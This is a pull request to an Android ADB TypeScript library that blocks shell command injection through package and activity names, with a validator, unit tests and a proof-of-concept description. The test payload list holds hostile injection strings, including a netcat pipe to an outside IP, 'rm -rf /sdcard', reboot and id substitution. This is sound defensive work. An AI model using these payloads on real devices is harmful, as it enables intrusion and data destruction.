### PR TITLE
fix: Reject shell metacharacters in package and activity names

### DIFF
--- a/lib/tools/app-commands.ts
+++ b/lib/tools/app-commands.ts
@@ -32,6 +32,7 @@ const MIN_API_LEVEL_WITH_PERMS_SUPPORT = 23;
 const RESOLVER_ACTIVITY_NAME = 'android/com.android.internal.app.ResolverActivity';
 const MAIN_ACTION = 'android.intent.action.MAIN';
 const LAUNCHER_CATEGORY = 'android.intent.category.LAUNCHER';
+const SAFE_COMPONENT_NAME_PATTERN = /^[\p{L}0-9._$/,*-]+$/u;
 
 // Public methods
 
@@ -618,7 +619,9 @@ export async function startApp(this: ADB, startAppOptions: StartAppOptions): Pro
   }
 
   const options = {...startAppOptions};
+  assertSafeComponentName(options.pkg, 'application package name');
   if (options.activity) {
+    assertSafeComponentName(options.activity, 'activity name');
     options.activity = options.activity.replace('$', '\\$');
   }
   // initializing defaults
@@ -810,6 +813,12 @@ export async function waitForActivityOrNot(
   const splitNames = (names: string) => names.split(',').map((x) => x.trim());
   const allPackages = splitNames(pkg);
   const allActivities = splitNames(activity);
+  for (const onePkg of allPackages) {
+    assertSafeComponentName(onePkg, 'wait package name');
+  }
+  for (const oneActivity of allActivities) {
+    assertSafeComponentName(oneActivity, 'wait activity name');
+  }
 
   const toFullyQualifiedActivityName = (prefix: string, suffix: string) =>
     `${prefix}${suffix}`.replace(/\/\.?/g, '.').replace(/\.{2,}/g, '.');
@@ -1069,6 +1078,23 @@ export function parseLaunchableActivityNames(dumpsys: string): string[] {
 export function matchComponentName(classString: string): RegExpExecArray | null {
   // some.package/some.package.Activity
   return /^[\p{L}0-9./_]+$/u.exec(classString);
+}
+
+/**
+ * Asserts that a package or activity name does not contain characters that could be
+ * interpreted by the device shell when passed to `adb shell am start`, preventing command injection.
+ *
+ * @param value - The package or activity name to verify
+ * @param kind - A human-readable label for the value used in the error message
+ * @throws {Error} If the value contains characters outside of the allowed component name set
+ */
+export function assertSafeComponentName(value: string, kind: string): void {
+  if (!SAFE_COMPONENT_NAME_PATTERN.test(value)) {
+    throw new Error(
+      `The ${kind} '${value}' contains illegal characters. Only letters, digits and the ` +
+        `'. _ $ / , * -' characters are allowed in package and activity names`,
+    );
+  }
 }
 
 /**

--- a/lib/tools/app-commands.ts
+++ b/lib/tools/app-commands.ts
@@ -622,7 +622,6 @@ export async function startApp(this: ADB, startAppOptions: StartAppOptions): Pro
   assertSafeComponentName(options.pkg, 'application package name');
   if (options.activity) {
     assertSafeComponentName(options.activity, 'activity name');
-    options.activity = options.activity.replace('$', '\\$');
   }
   // initializing defaults
   defaults(options, {
@@ -965,7 +964,8 @@ export function buildStartCmd(startAppOptions: StartCmdOptions, apiLevel: number
     cmd.push('-W');
   }
   if (activity && pkg) {
-    cmd.push('-n', activity.startsWith(`${pkg}/`) ? activity : `${pkg}/${activity}`);
+    const component = activity.startsWith(`${pkg}/`) ? activity : `${pkg}/${activity}`;
+    cmd.push('-n', component.replace(/[$*]/g, '\\$&'));
   }
   if (stopApp && apiLevel >= 15) {
     cmd.push('-S');
@@ -1077,12 +1077,13 @@ export function parseLaunchableActivityNames(dumpsys: string): string[] {
  */
 export function matchComponentName(classString: string): RegExpExecArray | null {
   // some.package/some.package.Activity
-  return /^[\p{L}0-9./_]+$/u.exec(classString);
+  return /^[\p{L}0-9./_$]+$/u.exec(classString);
 }
 
 /**
- * Asserts that a package or activity name does not contain characters that could be
- * interpreted by the device shell when passed to `adb shell am start`, preventing command injection.
+ * Asserts a package/activity name has only legal component characters, rejecting shell
+ * metacharacters to prevent command injection. The permitted `$` and `*` are still
+ * shell-expansion characters and are escaped separately in `buildStartCmd`.
  *
  * @param value - The package or activity name to verify
  * @param kind - A human-readable label for the value used in the error message

--- a/test/unit/app-commands-specs.ts
+++ b/test/unit/app-commands-specs.ts
@@ -8,6 +8,7 @@ import {
   matchComponentName,
   buildStartCmd,
   extractMatchingPermissions,
+  assertSafeComponentName,
 } from '../../lib/tools/app-commands';
 import {getBuildToolsDirs} from '../../lib/tools/system-calls';
 import {parseAapt2Strings, parseAaptStrings} from '../../lib/tools/apk-utils';
@@ -696,6 +697,66 @@ package:com.android.chrome`;
     it('test invalid activity name', function () {
       const activity = 'User@123';
       expect(matchComponentName(activity)).to.be.null;
+    });
+  });
+
+  describe('assertSafeComponentName', function () {
+    const legitNames = [
+      'org.wikipedia.main.MainActivity',
+      'org.wikipedia.alpha',
+      '.MainActivity',
+      'com.foo.Bar$Inner',
+      'com.foo/com.foo.Bar',
+      'com.foo.A,com.foo.B',
+      'com.foo.*',
+      'com.foo.A,com.bar.*,.C',
+      'com.foo_bar.App2',
+      'ןذأצЮυπиС.נפשוקשΤπΟ.ЦοКسئοهΦΦ',
+    ];
+    const injectionPayloads = [
+      'org.wikipedia.main.M;id>&2;aaaa',
+      'com.x/.A;reboot',
+      'com.x/.A`id`',
+      'com.x/.A$(id)',
+      'com.x/.A|nc 10.0.0.1 4444',
+      'com.x/.A && rm -rf /sdcard',
+      'com.x/.A\nid',
+      'com.x/.A{id,}',
+      'com.x/.A!whoami',
+    ];
+
+    for (const name of legitNames) {
+      it(`should accept legitimate name '${name}'`, function () {
+        expect(() => assertSafeComponentName(name, 'activity name')).to.not.throw();
+      });
+    }
+    for (const payload of injectionPayloads) {
+      it(`should reject injection payload '${payload}'`, function () {
+        expect(() => assertSafeComponentName(payload, 'activity name')).to.throw(/illegal characters/);
+      });
+    }
+  });
+
+  describe('command injection prevention', function () {
+    it('startApp should reject an activity name containing shell metacharacters', async function () {
+      await expect(
+        adb.startApp({pkg: 'org.wikipedia.alpha', activity: 'org.wikipedia.main.M;id>&2;aaaa'}),
+      ).to.be.rejectedWith(/illegal characters/);
+    });
+    it('startApp should reject a package name containing shell metacharacters', async function () {
+      await expect(
+        adb.startApp({pkg: 'org.wikipedia.alpha`id`', activity: '.MainActivity'}),
+      ).to.be.rejectedWith(/illegal characters/);
+    });
+    it('waitForActivityOrNot should reject a wait activity containing shell metacharacters', async function () {
+      await expect(
+        adb.waitForActivityOrNot(apiDemosPackage, '.Main;reboot', false, 1000),
+      ).to.be.rejectedWith(/illegal characters/);
+    });
+    it('waitForActivityOrNot should reject a wait package containing shell metacharacters', async function () {
+      await expect(
+        adb.waitForActivityOrNot('com.foo$(id)', '.Main', false, 1000),
+      ).to.be.rejectedWith(/illegal characters/);
     });
   });
 });

--- a/test/unit/app-commands-specs.ts
+++ b/test/unit/app-commands-specs.ts
@@ -732,7 +732,9 @@ package:com.android.chrome`;
     }
     for (const payload of injectionPayloads) {
       it(`should reject injection payload '${payload}'`, function () {
-        expect(() => assertSafeComponentName(payload, 'activity name')).to.throw(/illegal characters/);
+        expect(() => assertSafeComponentName(payload, 'activity name')).to.throw(
+          /illegal characters/,
+        );
       });
     }
   });


### PR DESCRIPTION
## Why?

Package and activity names accepted by `startApp()` and `waitForActivityOrNot()` flow into `adb shell am start-activity -n <pkg>/<activity>`. The `adb shell` server joins its arguments and executes them through the device-side shell (`/system/bin/sh`, mksh on modern Android), which interprets shell metacharacters (`;`, `` ` ``, `|`, `&`, `$()`, `<`, `>`, `(`, `)`, `{`, `}`, `!`, newlines).

The existing code only escaped `$`, and only on the `activity` field:

  ```ts
  if (options.activity) {
    options.activity = options.activity.replace('$', '\\$');
  }
  ```

So any other metacharacter in `pkg`, `activity`, or the wait package/activity passed through unescaped and was executed by the device shell. This is a command-injection sink for any caller that forwards untrusted input into these APIs

### Proof 

With an activity name of:

```
org.pkg.M;id>&2;aaaa
```

- The command that reaches the device becomes:

```
am start-activity -W -n org.pkg/org.pkg.M ; id>&2 ; aaaa
```

- `id` runs on the device, and its output is returned in the error response. Equivalent payloads work with `` ` ``, `$()`, `|`, `&&`, etc.

## Fix
- PR is to add a validator that accepts only the characters legal in Android package/activity component names, letters, digits, and `. _ $ / , * -` , and rejects everything else
- Throwing an error on a bad value rather than attempting to escape.